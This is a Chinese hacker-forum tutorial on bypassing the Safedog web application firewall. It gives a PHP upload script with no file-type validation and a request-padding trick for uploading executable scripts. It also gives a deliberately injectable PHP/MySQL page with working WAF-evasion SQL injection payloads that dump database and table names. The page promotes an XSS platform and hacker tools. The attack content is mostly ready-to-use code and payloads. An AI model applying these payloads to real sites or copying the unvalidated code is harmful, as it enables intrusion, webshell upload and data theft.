SQL注入上传绕过安全狗

admin
11840admin首席执行运营官
2017-07-17 02:27:24
11840 2017-07-17 02:27:24
黑客话题: SQL注入
             SQL注入 上传绕过安全狗

推荐网站:https://xss.tv  
国内长度最短的XSS平台,支持https协议



一,绕过安全狗上传可执行脚本
附上php上传脚本源码,此源码未对上传文件类型做校验
<?php
       move_uploaded_file($_FILES["file"]["tmp_name"],"./" . $_FILES["file"]["name"]);
       echo "Stored in: " . "./" . $_FILES["file"]["name"];
?>
<form action="" method="post" enctype="multipart/form-data">
<input type="file" name="file" id="file" />
<input type="submit" name="submit" value="Submit" />
</form>

-------------


绕过方法,工具:burpsuite
1,用 php脚本或者js,python等其他语言,生成48930个字符
<?php
for ($i=0; $i <= 48930; $i++) {
       echo 'o';
}
?>

2,抓包,改包

3,添加后如图:

4,查看当前目录,上传成功1



二,sql注入绕过安全狗
1,测试文件,明显的字符型 SQL注入
<?php
       header("Content-type: text/html; charset=utf-8");
       $link = mysql_connect("localhost","root","root");
       mysql_select_db("test",$link);
       $sql = "select * from cms where id='{$_GET['id']}'";
       echo $sql;
       echo '
-----------------------------
';

       $res = mysql_query($sql);
       while ( $rows = mysql_fetch_array($res)) {
               echo $rows[0];
               echo $rows[1];
               echo $rows[2];
       }
?>
2,正常运行界面


3,添加注入测试语句
https://localhost/waf123.php?id=3' and 1=1 --+

4,修改测试语句
https://localhost/waf123.php?id=3'/*!and*/%202e1/**/=2e1--+




5,暴库
https://localhost/waf123.php?id=2e1'/*!and*/ 2e1/**/=2e1union(/*.1112*//**//*!*/(select@1/**/,2,database/**/(),4,5))--+

6,爆表
https://localhost/waf123.php?id=2e1'/*!and*/ 2e1/**/=2e1union(/*.1112*//**//*!*/(select@1/**/,2,group_concat(table_name),4,5 from information_schema.tables where table_schema=0x74657374))--+


本文标题:SQL注入上传绕过安全狗
本文作者:admin
本文来自:蚁安黑客官网
转载请注明本文链接:http://bbs.mayidui.net/t708.html
游客
登录黑客论坛后才可以回帖,黑客登录 或者 注册黑客
weixin
蚁安黑客

找黑客工具、找黑客教程、找黑客朋友,你想不到的黑客技术这儿都有!

微信号:baiyiwangan